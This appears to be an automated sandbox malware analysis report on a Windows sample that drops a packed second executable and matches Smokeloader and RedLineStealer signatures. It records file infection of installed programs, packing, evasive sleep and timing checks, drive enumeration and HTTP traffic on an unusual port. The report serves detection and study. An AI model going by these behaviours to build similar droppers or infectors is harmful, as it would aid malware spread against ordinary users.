Dropped File: C:\Users\user\AppData\Local\Temp\jJEAWO.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794

Source: C:\Users\user\Desktop\current[1].exe	Code function: String function: 0041D6B0 appears 39 times
Source: C:\Users\user\Desktop\current[1].exe	Code function: String function: 0075D917 appears 38 times

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7452 -s 1624

Source: MyProg.exe.1.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Source: current[1].exe, 00000000.00000000.1675365192.000000000047F000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWonder4 vs current[1].exe
Source: current[1].exe, 00000000.00000003.1699663206.00000000008FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWonder4 vs current[1].exe
Source: current[1].exe	Binary or memory string: OriginalFilenameWonder4 vs current[1].exe

Source: current[1].exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: 00000000.00000002.2053042174.000000000082E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: jJEAWO.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: current[1].exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: jJEAWO.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: jJEAWO.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@6/15@2/2

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Code function: 1_2_00E9119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

1_2_00E9119F

Source: C:\Users\user\Desktop\current[1].exe

Code function: 0_2_0082F056 CreateToolhelp32Snapshot,Module32First,

0_2_0082F056

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7452
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7436

Source: C:\Users\user\Desktop\current[1].exe

File created: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Jump to behavior

Source: C:\Users\user\Desktop\current[1].exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\current[1].exe

File read: C:\Users\user\Desktop\current[1].exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\current[1].exe "C:\Users\user\Desktop\current[1].exe"
Source: C:\Users\user\Desktop\current[1].exe	Process created: C:\Users\user\AppData\Local\Temp\jJEAWO.exe C:\Users\user\AppData\Local\Temp\jJEAWO.exe
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7452 -s 1624
Source: C:\Users\user\Desktop\current[1].exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1504
Source: C:\Users\user\Desktop\current[1].exe	Process created: C:\Users\user\AppData\Local\Temp\jJEAWO.exe C:\Users\user\AppData\Local\Temp\jJEAWO.exe			Jump to behavior

Source: C:\Users\user\Desktop\current[1].exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: msimg32.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: msvcr100.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: webio.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: ncryptsslp.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: dpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: ntvdm64.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: textshaping.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: textinputframework.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: coreuicomponents.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: coremessaging.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Section loaded: wintypes.dll			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\current[1].exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: current[1].exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
Source:	Binary string: .C:\yatafekubigu\xegoh\kegokececana\hobof.pdb source: current[1].exe
Source:	Binary string: C:\yatafekubigu\xegoh\kegokececana\hobof.pdb source: current[1].exe

Data Obfuscation

Source: C:\Users\user\Desktop\current[1].exe	Unpacked PE file: 0.2.current[1].exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;ESu,:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Unpacked PE file: 1.2.jJEAWO.exe.e90000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Source: C:\Users\user\Desktop\current[1].exe

Unpacked PE file: 0.2.current[1].exe.400000.0.unpack

Source: initial sample

Static PE information: section where entry point is pointing to: ESu,

Source: current[1].exe	Static PE information: section name: ESu,
Source: jJEAWO.exe.0.dr	Static PE information: section name: .aspack
Source: jJEAWO.exe.0.dr	Static PE information: section name: .adata
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.1.dr	Static PE information: section name: PELIB
Source: MyProg.exe.1.dr	Static PE information: section name: Y|uR
Source: SciTE.exe.1.dr	Static PE information: section name: u

Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0046AEDC push edi; iretd		0_2_0046AEDD
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00469FC4 push edx; ret		0_2_00469FC5
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00830B3E push edx; ret		0_2_00830B3F
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Code function: 1_2_00E91638 push dword ptr [00E93084h]; ret		1_2_00E9170E
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Code function: 1_2_00E9600A push ebp; ret		1_2_00E9600D
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Code function: 1_2_00E92D9B push ecx; ret		1_2_00E92DAB
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Code function: 1_2_00E96014 push 00E914E1h; ret		1_2_00E96425

Source: current[1].exe	Static PE information: section name: .text entropy: 7.864241341045099
Source: current[1].exe	Static PE information: section name: ESu, entropy: 6.934721013700985
Source: jJEAWO.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ entropy: 6.934597182758975
Source: MyProg.exe.1.dr	Static PE information: section name: Y|uR entropy: 6.935322309363604
Source: SciTE.exe.1.dr	Static PE information: section name: u entropy: 6.934363744578973

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe			Jump to behavior

Source: C:\Users\user\Desktop\current[1].exe	File created: C:\Users\user\AppData\Local\Temp\jJEAWO.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File created: C:\Program Files\7-Zip\Uninstall.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 799

Source: C:\Users\user\Desktop\current[1].exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\current[1].exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Users\user\Desktop\current[1].exe TID: 7568

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Code function: 1_2_00E91718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00E91754h

1_2_00E91718

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Code function: 1_2_00E929E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

1_2_00E929E2

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Code function: 1_2_00E92B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_00E92B8C

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\			Jump to behavior
